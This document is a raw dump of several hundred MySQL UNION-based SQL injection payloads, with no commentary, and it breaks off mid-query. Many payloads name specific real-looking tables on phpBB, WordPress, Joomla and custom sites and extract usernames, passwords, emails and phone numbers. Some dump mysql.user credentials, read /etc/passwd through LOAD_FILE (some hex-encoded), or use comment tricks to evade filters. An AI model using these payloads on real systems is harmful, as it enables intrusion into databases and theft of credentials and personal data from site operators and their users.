-1 union select 1,user(),3,4/* -1 union select 1,user(),3,4,5-- -1 Union select 1,user(),3,4,5/* 1' union select 1,user(),3,4,5,6,7-- -1 union select 1,USER(),3,4,5,6,7/* -1 union select 1,user(),3,4,5,6,7,8,9,10,11/* -1 UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15/* 1 union select 1,user(),3,4,5,6,7,8,9,10,11,version(),database()/* -1 union select 1,user(),3,4,database()/* -1 union select 1,user(),3,4,null,null,7,8,version()/* -1 UNION SELECT 1,USER(),3,4,VERSION()/* 1 UNION SELECT 1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -1 union select 1,user(),3,database(),5,6,7,8,9,10 from mysql.user -1 union select 1,user(),3,database(),5,version(),7,8,9,10,11,12,13,14-- -1 union select 1,user(),3,database(),char(32),char(32),version()/* -1) union select 1,user(),3 from relise/* -1 union select 1,USER(),3,VERSION(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* -1 union select 1,user(),database(),4,5,6,7,8,9,10/* -1' union select 1,user(),group_concat(table_name),4,5,database(),version(),8,9,10,11,12 from information_schema.tables -- -1 union select 1,userid,0x3c3c3c3,unhex(hex(password)),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users limit 1,1 -- -1 union select 1,user_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from tennis_users limit 0,10-- -1 union select 1,username,3,4,5,6,7,8,9,10 from users-- -1' union select 1,username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19 from users/* 1 UNION SELECT 1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users-- -1 union select 1,user_name,3,password,5,6,7,8,9,10,11,12,13 from user-- -1 union select 1,Username,3,Password,5,6,7,8 from User-- -1 union select 1,username,3,password,5,version(),7,8,9,10 from user limit 1,1/* -1 union select 1,user_name,3,user_pass,5,6,7,8 from core_user limit 0,1/* -1 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users/* -1 union select 1,USERNAME,password,4,5,6,7 from users limit 1,1/* -1 union select 1,username,password,4 from admin -- -1 union select 1,username,password,4 from users 1 UNION SELECT 1,username,user_password,4,5,6,7,8,9,10,11,12 FROM phpbb_users/* -1 union select 1,username,user_password,4,5,6,7,8,9,10 from phpbb_users limit 1,1/* -1 union select 1,username,user_password,4,5,6,7,8,9,user(),11 from phpbb_users where user_id=3/* -1 union select 1,user,pass from users/* -1 union select 1,user,password,4,5,6,7,8,9 from mysql.user-- -1/**/union/**/select/**/1,user,password,4,5,6 from mysql.user limit 1,2/* -1 union select 1,user.usrname from mysql.user/* -1 union select 1,user(),version()/* -1 union select 1,user(),version(),4 -- -1 union select 1,user(),version(),4,5 -- -1 union select 1,USER(),VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,DATABASE(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/* -1 union select 1,user(),version(),4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from mysql.user-- -1 union select 1,user(),version(),4,database() -- -1 union select 1,user(),version(),4,database(),6,7,8/* -1 union select 1,user(),version(),5/* -1 union select 1,user(),version(),database(),5,6,7,8,9,10/* -1 union select 1,user(),version(),database(),5,6,7,8,9,10,11/* -1 union select 1,version() -- -1 union select 1,version()# -1 /*!UNION*/ SELECT 1,version() -- -1 union select 1,version(),3-- 1 union select 1,version(),3,0x203a20,user(),0x203a20,database(),8,9,10,11,12,13,14,15-- -1' UNION SELECT 1,version(),3,4 -- -1' UNION SELECT 1,version(),3,4,5 -- -1' union select 1,version(),3,4,5,6,7/* -1 union select 1,version(),3,4,5,6,7,8-- -1 union select 1,@@version,3,4,5,6,7,8,9 -1 union select 1,version(),3,4,5,6,7,8,9 /* -1' union select 1,version(),3,4,5,6,7,8,9 '-- -1' union select 1,version(),3,4,5,6,7,8,9/* -1/**/UNION/**/SELECT 1,version(),3,4,5,6,7,8,9-- -1 union select 1,version(),3,4,5,6,7,8,9,10-- -1 union select 1,version(),3,4,5,6,7,8,9,10-- -1' union select 1,version(),3,4,5,6,7,8,9,10 -- -1 union select 1,version(),3,4,5,6,7,8,9,10,11-- -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12-- -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13 -- -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 1 UnIon selECt 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -- -1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables WHERE table_schema=0x6C697465616964 -1' union select 1,version(),3,4,5,6,7,8,9,10 from guestbook/* -1 union select 1,version(),3,4,5,6,7,user()-- -1 union select 1,version(),3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1 union select 1,version(),3,4,5,now(),7,8,9 -1 union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14/* -1 union select 1,version(),3,4,5,user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20-- -1 union select 1,version(),3,4,database(),6,user(),8,9-- -1 union select 1,version(),3,4,user()/* -1 union select 1,version(),3,4,user(),6,group_concat(table_name separator 0x0a),8,9,10 from information_schema.tables/* -1 union select 1,version(),3,database(),5,6,7,8/* -1 union select 1,VERSION(),3,USER(),5/* -1 union select 1,version(),3,user(),5,6/* -1 union select 1,version(),3,user(),5,6,7,8,9-- -1 union select 1,version(),3,user(),5,6,7,database(),9,10,11,12,13,14,15/* -1 union select 1,@@version_compile_os-- -1 union select 1,version(),concat(database(),char(58),user())/* -1 union select 1,version(),database()-- -1 union select 1,version(),database(),4,5-- -1' union select 1,Version(),database(),4,5,6,user()/* -1 union select 1,version(),database(),4,5,6,user(),8,9,0 from articles/* 1 union select 1,version(),user(),4,5/* 1 union select 1,version(),user(),4,5,6,7,8-- -1 union select 1,version(),user(),4,5,6,7,8,9,10-- -1 union select 1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1 union select 1,version(),user(),4,5,database(),7,8,9,10,concat(user_login,0x3a,user_pass),12 from wp_users limit 0,1 -1 union select 1,version(),user(),database(),5/* -1 UNION SELECT 1,VERSION(),USER(),DATABASE(),5,6,7/* -1)) union select 1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15/* -1 union select 1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17 -1 union select 1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -1 UNION SELECT 2,2,3,4,User(),6,database(),8,9,10,11 -1 union select 3,4,5,6,7,concat(login,0x3a,password,0x3a,email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users limit 0,1/* -1 union select 6,2,database(),version(),USER()/* -1 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)-- 1 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),2-- 1 union select aes_decrypt(aes_encrypt(concat_ws(0x2a,version(),user(),database()),0x71),0x71),2,3,4,5 -1 union select aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),2,3,4/* -1 union select AES_DECRYPT(AES_ENCRYPT(pass,0x17),0x17) from adm/* -1 UNION SELECT AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),1,22 from INFORMATION_SCHEMA.TABLES limit 32,1/* -1' union select aes_decrypt(aes_encrypt(user(),0x71),0x71),2/* -1 union select aes_decrypt(aes_encrypt(user,0x71),0x71) from users/* -1 union select aes_decrypt(aes_encrypt(version(),0x71),0x71)/* -1' union select aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5/* -1 union select aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5,6,7,8/* -1 union select all 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44-- -1 union select all 1,2,3,4,5,6,7,version(),9/* -1 union select all 1,2,3,4,5,table_name from information_schema.tables limit 16,1/* -1 union select all 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11-- -1 union select all 1,2,3,4,version(),6,7,8,9,10,11-- '-1 union select all 1,2,3,concat_ws -1 union select all 1,2,3,table_name,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.columns order by 1 desc limit 0,1 -- -1 union select all 1,2,concat_ws(0x3a,version(),user(),database()),4,5-- -1 union select all 1,2,group_concat(0x0b,login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from conf_users -1 union select all 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9-- -1 union select all 1,username,3,password,5 from users-- -1 union select column_name,2,3,4 from information_schema.columns where table_name=CHAR(97, 108, 117, 109, 110, 105) limit 7,1-- -1' union select column_name,2 from information_schema.columns where table_name='passwords'/* 1 union select concat(0x2a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 limit 1,1/* -1 union select concat(0x2,version(),user(),database()),2,3,4,5 limit 1,1 -1 union select concat(0x3a3a,login,0x3a3a,password) from users limit 1,1 -1 union select concat(0x3a3a,loginnamn,0x3a3a,losenord,0x3a3a) from anv limit 0,1/* -1 union select concat(0x3a3a,user_login,0x3a3a,user_password),null,null from sys_user limit 0,1 -1 union select concat(0x3a,user()) -- -1 UNION SELECT CONCAT(0x3a,Version(),0x3a),2,3,4,5,6,7,8,9/* -1 union select concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a) -- -1 union select concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),2,3,4-- -1 union select concat(0x3a,version(),0x3a,user(),0x3a,database()),1,1/* 1 union select concat(0x3a,version(),user(),database()),3 1 union select concat(0x3,version(),user(),database()) 1 union select concat(0x3,version(),user(),database()),2,3,4,5,6 limit 1,1/* -1 UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64)-- -1 UNION SELECT concat(admin_name,char(58),pwd,char(58),id) FROM sbwmd_admin/* -1 union select concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71)),aes_decrypt(aes_encrypt(user(),0x71),0x71)/* -1' union select concat('
',version(),'
',user(),'
',database())/* -1/**/union/**/select/**/concat(char(64,64),NOMBRE,0x3a,USUARIO,0x3a,PASSWORD,0x3a,E_MAIL,0x3a,V_E_MAIL,char(64,64)) from fa_usuarios limit 5768,1/* -1 UNION SELECT CONCAT(concat_ws(0x3a,email,name,description)),2,3,4,5,6,7,8,9 from news_autors limit 0,1-- -1 union select concat(convert(username using cp1251),0x3a,convert(user_password using cp1251)) from phpbb_users limit 1,2/* -1 union select concat(database(),char(58),user()),2,3,4,5,6/* -1 union select concat(database(),char(58),user(),char(58),version())/* -1 union select concat(database(),char(58),user(),char(58),version()),2,3/* -1 union select concat(database(),char(58),user(),char(58),version()),2,3,4/* -1 union select concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11/* -1 UNION SELECT concat(email,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13 FROM hellenic_main.powerUsers/* -1 union select concat(email,0x3a,password),2,3,4 from user/* -1 union select concat(email,char(58)),1 from emails/* 1 union select concat(id,char(58),user,char(58),pass,char(58,32,32,32),rights,char(58),rname,char(58),mail,char(58),char(58),editor) ,concat(char(83,101,115,115,105,111,110,58,32),sess) from login/* -1 union select concat(login,0x3a3a,password,0x3a3a,name,0x3a3a3a3a) from users limit 0,1/* -1 UNION SELECT concat(login,0x3a,email,0x3a,password) FROM users limit 0,1/* -1 union select concat(login,0x3a,pass),2,3,4,5,6,7 from admin/* -1 UNION SELECT concat(login,0x3a,pass),2,3 FROM users LIMIT 0,1/* -1 union select concat(login,0x3a,passwd) from users-- -1 union select concat(login,0x3a,password) from users/* -1 union select concat(login,0x3a,password) from users limit 0,1/* -1 union select concat(login,0x3a,pwd),2,3,4,5 from mostd_users/* -1 union select concat(login,char(58),pass) from users limit 0,1/* -1 union select concat(login,char(58),password,char(32,32,32,32,72,105,32,102,114,111,109,32,84,101,114,109,105,110,64,76)),2 from users limit 1,2/* -1 union select concat(name,0x3a3a,e_mail,0x3a3a,pass),2,3,4 from tbl_artist limit 1,10/* -1 union select concat(name,0x3a,pass) from users/* -1 union select concat(name,char(58),user),version(),0,0 from users/* -1 union select concat(name,':',passwd) from users limit 0,1/* -1 union select concat(nick,char(58),pwd,char(58),email) from users/* 1 union select concat(table_name) from information_schema.tables limit 34,10 -- -1' union select concat(U_Name,char(59),U_Password) FROM w3t_Users LIMIT 2,1/* 1 union select concat(user(),0x3a,database(),0x3a,version())-- -1' union select concat(user,0x3a,pass) from users/* -1 union select concat(user,0x3a,password),2,3,4,5,6 from mysql.user limit 1,1/* -1 union SELECT concat(user,0x3a,password),2 from mysql.user limit 0,1-- 1 union select concat(user,0x3a,password) from mysql.user -1 union select concat(user(),0x3a,version()) -1 union select concat(user(),0x3a,version(),0x3a,database())-- -1' union select concat(user(),0x3a,version(),0x3a,database())/* -1 union select concat(user(),0x3a,version(),0x3a,database()),2,3-- -1 union select concat(user(),0x3a,version(),0x3a,database()),2,3,4/* -1' union select concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7/* -1 union select concat(user,char(58),password),2,3,4,5,6,7 from mysql.user/* -1 union select concat(user,char(58),password),2,3 from mysql.user/* -1 union select concat(user,char(58),password),2,3 from mysql.user limit 0,1/* -1 union select concat(user,char(58),password),2,concat(version(),0x3a,user() ,0x3a,database()),4,5,6 from mysql.user/* -1 union select concat(user,char(58),password) from mysql.user/* 1 union select concat(user,char(58),password) from mysql.user/* -1 union select concat(user(),char(58),version(),char(58),database()),2 /* -1 union select concat(username,0x3a3a,pass) from users limit 2,1-- -1 union select concat(username,0x3a3a,pass) from users limit 2,1/* 1 union select concat(username,0x3a3a,user_password,0x3a3a) from forum.users limit 1,10/* -1 union select concat(username,0x3a,email,0x3a,password),2 from news_users-- -1 union select concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from mos_users/* -1 union select concat(username,0x3a,user_password) from phpbb_pingpong_users limit 1,10/* -1 union select concat(username,char(58),password),2,3,4,5,6 from user limit 0,1/* -1 union select concat(username,char(58),password),2 from users/* -1' union select concat(username,char(58),password) from administrators/* -1 union select concat(username,char(58),user_password),2,3,4 from phpbb_users limit 1,1/* 1 union select concat(user_pass,0x3a,user_name),2,3,4 from users/* -1 union select concat(user,password) from users/* -1 union select concat(user(),version()),2/* -1 union select concat(version(),0x2F,database(),0x2F,user())/* -1 union select concat(version(),0x3a,database(),0x3a,user()) -1 union select concat(version(),0x3a,database(),0x3a,user())/* -1 union select concat(version(),0x3a,database(),0x3a,user()),2,3/* -1) UNION SELECT concat(VERSION(),0x3a,USER(),0x3a,DATABASE())# -1 union select concat(version(),0x3a,user(),0x3a,database()),2,3 -1 union select concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10-- -1 union select concat(version(),char(58),database(),char(58),user())/* -1 UNION SELECT concat(version(),char(58),user())/* -1 union select concat(version(),char(58),user()),concat_ws(char(58),user,pass) from users/* -1 union select concat_ws -1 union select concat_ws(0x05,version(),database(),user()),2,3,4,5,6,7,8,9/* -1 union select concat_ws(0x0b,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),concat_ws(0x3a3a,access_code,email,hostname)) from otvpo_users-- -1 union select concat_ws(0x202d20,version(),user(),database(),@@tmpdir,@@datadir),concat_ws(0x3a,@@basedir,@@version_compile_os),3,4 1' UNION SELECT CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE())# -1 union select concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)-- -1 union select concat_ws(0x203a20,version(),user(),database())/* -1 /*!union*/ /*!select*/ concat_ws(0x20a,0x73716c696e6a,database(),user(),version())-- 1 union select concat_ws(0x2a,user(),0x2a,version(),0x2a,database())/* -1 union select concat_ws(0x2a,user(),version(),database()),2,3,4,5,6,7-- -1 union select concat_ws(0x2b,version(),user(),@@version_compile_os),2,3,4 -- -1 union select concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary))/* -1 union select concat_ws(0x2f,user,host,password,file_priv) from mysql.user limit 4,1 -1 union select concat_ws(0x2F,version(),database(),user())/* -1' union select concat_ws(0x2F,version(),database(),user())/* 1 union select concat_ws(0x2F,version(), database(),user())/* -1 union select concat_ws(0x2F,version(),database(),user()),2/* -1 union select concat_ws(0x2F,version(),database(),user()),2,3,4,5,6/* -1 union select concat_ws(0x2f,version(),user(),database())-- -1 union select concat_ws(0x3a,1111,user(),version(),database(),@@version_compile_os)-- -1 union select concat_ws(0x3a,111,user(),version(),database(),@@version_compile_os)-- 1 /*!union*/ /*!select*/ concat_ws(0x3a,111,user(),version(),database(),@@version_compile_os)-- -1 union select concat_ws(0x3a3a20203a3a,version(),database(),user()),2,3,4,5,6,7 -1 union select concat_ws(0x3a3a3a,table_name,column_name) from information_schema.columns-- -1 union select concat_ws(0x3a3a,adv_uname,adv_pass),2,3,4 from getitgay_mod__user limit 0,1-- 1' union select concat_ws(0x3a3a,aid,name,email,pwd,radminsuper) from spnuke_authors -- -1) union select concat_ws(0x3a3a,email,login,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from users limit 20,1/* -1 union select concat_ws(0x3a3a,login,password),2,3 from authors limit 0,1/* -1 union select concat_ws(0x3a3a,login,password) from users limit 0,1/* -1 union select concat_ws(0x3a3a,sitenaam,mysqluser,mysqlpass) from beheerindex -- -1 union select concat_ws(0x3a3a,table_name,column_name) from information_schema.columns limit 296,1-- -1 union select concat_ws(0x3a3a,username,password) from pref_users-- -1 union select concat_Ws(0x3a3a,username,password) from user -- -1 union select concat_ws(0x3a3a,User,password,user()),2,3 from mysql.user/* -1 union select concat_ws(0x3a3a,usuario,clave) from usuarios limit 0,1/* -1 union select concat_ws(0x3a3a,usuario,password,database()),2,3,4,5,6,7,8,9,10,11,12 from usuarios limit 0,1/* -1 union select concat_ws(0x3a3a,version(),database(),user()),2,3 -- -1 union select concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os) -- -1 union select concat_ws(0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(version(),0x71),0x71),aes_decrypt(aes_encrypt(database(),0x71),0x71))/* -1 union select concat_ws(0x3a,database(),user(),version()) -- 1' union select concat_ws(0x3a,database(),user(),version()) -- -1 union select concat_ws(0x3a,database(),user(),version()),2,3,4,5 -1 union select concat_ws(0x3A, database(), version(), user())/* 1 union select concat_ws(0x3a,database(),version(),user()),2,3,4,5-- -1) union select concat_ws(0x3a,id,email,country,city,website,icq,uname,password) from users/* -1 union select concat_ws(0x3a,id,last_name,first_name,middle_name,login,password,email,phone,address),2,3 from users limit 0,1 -- -1 union select concat_ws(0x3a,id,user,u_password) from Users_access -- -1 union select concat_ws(0x3a,login,mail),2,3,4,5,6,7,8 from admin where id=1/* -1 union select concat_ws(0x3a,loginname,password),2 from phplist_admin-- -1 union select concat_ws(0x3a,loginName,password,firstName) from users where userID=1/* -1 union select concat_ws(0x3a,login,pass),1,2 from st_users where login=char(97,100,109,105,110) -1 union select concat_ws(0x3a,login,pass) from inforos_manager/* -1 UNION SELECT concat_ws(0x3a,login,passwd,fio,perm) from t_users limit 5,1-- -1 union select concat_ws(0x3a,login,password),2,3,4 from mtr_admin -- 1' union select concat_ws(0x3a,login,password,email),2,3,4 from forum_users limit 1,1/* -1 union select concat_ws(0x3a,login,password,email) from AUSER/* -1' union select concat_ws(0x3a,login,password) from b_user -- -1' union select concat_ws(0x3a,name,login,pass) from users limit 2,1/* 1' union select concat_ws(0x3a,name,passwd) from userreg/* -1 union select concat_ws(0x3a,name,password,email),2 from top_user limit 0,1/* -1 union select concat_ws(0x3a,name,password,email) from LUM_User limit 0,1-- -1 union select concat_ws(0x3a,name,pwd) from chat_users/* -1 union select concat_ws(0x3a,name,username,passwd,email) from user/* -1 union select concat_ws(0x3a,table_name,version()) from information_schema.tables/* -1 union select concat_ws(0x3a,table_schema,table_name,column_name),2,3,4,5 from information_schema.columns/* 1 union select concat_ws(0x3a,uid,name,login,pas) from users/* -1 union select concat_ws(0x3a,uname,pass),2 from shir_users-- -1 union select concat_ws(0x3a,user(),database(),vers -1 union select concat_ws(0x3a ,user(),database(),version())-- -1 UNION SELECt concat_ws(0x3a,user(),database(),version())-- -1 union select concat_ws(0x3a,user(),database(),version()),2 -1 UNION SELECT concat_ws(0x3a ,user(),database(),version()),2-- -1 union select concat_ws(0x3a,user(),database(),version()),2,3/* -1 UNION SELECT concat_ws(0x3a,User(),database(),version()),2,3,4,5,6 -- -1 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7-- -1 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8-- -1 union select concat_Ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9-- 1 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14-- -1 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5 FROM information_schema.tables-- -1 union select concat_ws(0x3a,user(),database(),version(),@@version_compile_os),2,3,4,5,6,7-- -1 union select concat_ws(0x3a,username,email,password,admin) from users_2 limit 0,1-- -1 union select concat_ws(0x3a,username,email,password,usertype),2,3,4,5 from aleksandrov.jos_users limit 0,1/* -1 union select concat_ws(0x3a,username,password,user(),version()) from admin-- -1 union select concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mysql.user/* -1 union select concat_ws(0x3a,user,password,file_priv),2,3,4,5,6 from mysql.user-- -1 UNION SELECT concat_ws(0x3a,user,password,host,file_priv) from mysql.user limit 4,1# -1 union select concat_ws(0x3a,user_username,user_password) FROM dotproject.users limit 1,1 -- -1 union select concat_ws(0x3a,user(),version()),2,3-- -1 union select concat_ws(0x3a,user(),version(),database())-- -1' union select concat_ws(0x3a,user(),version(),database()) -- -1 union select concat_ws(0x3a,user(),version(),database()),2,3 -- -1 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9-- -1 UNION SELECT concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/* -1 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os) -1 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2,3 -- -1 union select concat_ws(0x3a,vcLogin,vcPassword) from tadmins limit 4,1/* -1 union /*!select*/ concat_ws(0x3a,version(),database(),user()) -1 union select concat_ws(0x3a,version(),database(),user())-- -1 union select concat_ws(0x3a,version(),database(),user())/* -1 union select concat_ws(0x3a,version(),database(),user()),2-- 1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2/* -1 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6/* -1 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -1 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* -1 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os) ,2-- -1 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3-- -1 UNION SELECT concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4/* -1' union select concat_ws(0x3a,version(),user()),2,3/* -1 union select concat_ws(0x3a,version(),user(),database())/* -1' union select concat_ws(0x3A,version(),user(),database())-- -1) UNION SELECT concat_ws(0x3a,version(),user(),database())/* -1' union select concat_ws(0x3a,version(),user(),database()),2 -- -1 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8 -- -1 union select concat_ws(0x3A,version(),user(),database()),2,3,4,5,6,7,8,9,10,11-- -1 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -1 UNION SELECT CONCAT_WS(0x3A,VERSION(),USER(),DATABASE()),LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 1' union select concat_ws(0x3b,user(),database(),version())/* -1 union select concat_ws(0x3,version(),user(),database())/* -1 union select concat_ws(0x3,version(),user(),database()),2/* 1 union select concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7 -1 union select concat_ws(0x7c,user(),version(),database())-- -1 union select concat_ws(char(32,45,32),admin_id,login,password,checknum,agent,email,access),2,3,4,5 from altaru_dealers.svts_admins-- 1 union select concat_ws(CHAR(58),user(),database(),version()),2,3,4,5/* -1 union select concat_ws(char(58),username,password) from admin 1 union select concat_ws(char(58),user,password),2,concat(version(),char(58),user(),char(58),database()),4 from mysql.user/* -1 union select concat_ws(char(58),user(),version(),database())/* -1 union select concat_ws(char(95,95,95),user(),version(),database())/* -1 union select concat_ws(username,0x3a,user_password),2,3,4,5 from big6_users limit 1,1/* 1 union select concat_ws(version(),0x3a,user(),0x3a,database()),2,3,4,5-- 1 union select concat_ws(version(),database(),user())-- -1 union select concat_ws(version(),database(),user()),2 -- -1 union select concat_ws(version(),database(),user()),2-- -1' union select concat_ws(':',version(),database(),user()),2,3 -- -1 union select convert(concat(comp_domain,char(58),comp_user_fio,char(58),comp_user_mail,char(58),comp_user_pass,char(58),comp_addr_phone),char),2 from comp/* -1 union select convert(concat(user(),0x20,database(),0x20,version()) using latin1),2,3,4/* -1 union select convert(concat(version(),char(58),user(),char(58),database()),char),2,3,4,5,6,7,8,9,10,11,12,13/* -1 union select CONVERT(concat_ws(0x3a,version(),user(),database()) using latin1)/* -1 union select convert(concat_ws(0x3a,version(),user(),database()) using latin1),2,3,4/* -1) union select convert(concat_ws(char(58),user,password) using cp1251) from mysql.user/* -1 union select convert(version() using binary)/* -1 union select convert(version() using cp1251)/* -1 union select convert(version() using latin1) from mysql.user/* -1 union select count(concat_ws(0x3a,nick,pass,mail)),2 from elixir_users/* -1 union select database() /* -1 union select database(),2,version(),4,5,6,7,user(),9,10,11,12/* -1 union select database(),system_user(),version()/* 1 union select database(),user()/* -1 union select database(),user(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16/* -1 UNION SELECT database(),version() -1 UNION SELECT database(),version(),user(),database(),version()/* -1) union select DISTINCT concat(table_schema,'.',table_name,'=>',COLUMN_NAME,'
') from INFORMATION_SCHEMA.COLUMNS -- -1 union select email,2 from users limit 1,19000/* -1 union select email,url,3,icq,gorod,6,7,8 from members/* -1 union select * from msysobjects in '.' -1 union select * from mysql.information_schema where table_schema=cnetnetworks-- -1 union select group_concat(0x0b,table_name),2,3,4 from information_schema.tables -- -1 union select group_concat(0x3a3a,u_name,0x3a,u_pwd) from tbl_users -- -1 union select group_concat(0x3C62723E,concat_ws(0x3a,username,user_password)) from phpbb_users -1 union select group_concat(column_name) from information_schema.columns where table_name=char(116,98,108,95,112,101,114,115,111,110,115) -- -1 union select group_concat(concat_ws(0x3a, id, username, password , email, name) SEPARATOR 0x3a),2 from astramed_alarm.users Limit 0,1 -- -1 union select group_concat(table_name) from information_schema.tables -- -1 union select group_concat(version(),0x3A3A,database(),0x3A3A,user()),2,3-- 1 union select group_concat(version(),0x3a,user(),0x3a,database()) 1' union select id,password,3,4,5,6,7,8 from a_users/* -1 union select load_file(0x2F6574632F706173737764)-- -1 union select LOAD_FILE(0x2f6574632f706173737764),2/* -1 union select login,2,password,4,5,6,7,8,9,10,11,12 from users limit 1,1 -1 union select login,2,password,4,email,6,icq,8,9,10,11,12 from users limit 8200,8201/* -1 union select login from users where login=20/* -1 union select login,password,3 from admin/* -1 union select _login_xz from _system_user/* 1 union select name from admin/* -1 union select name from user -- -1 union select name,password,3,4,5 from users/* -1 union select null/* -1 UNION SELECT 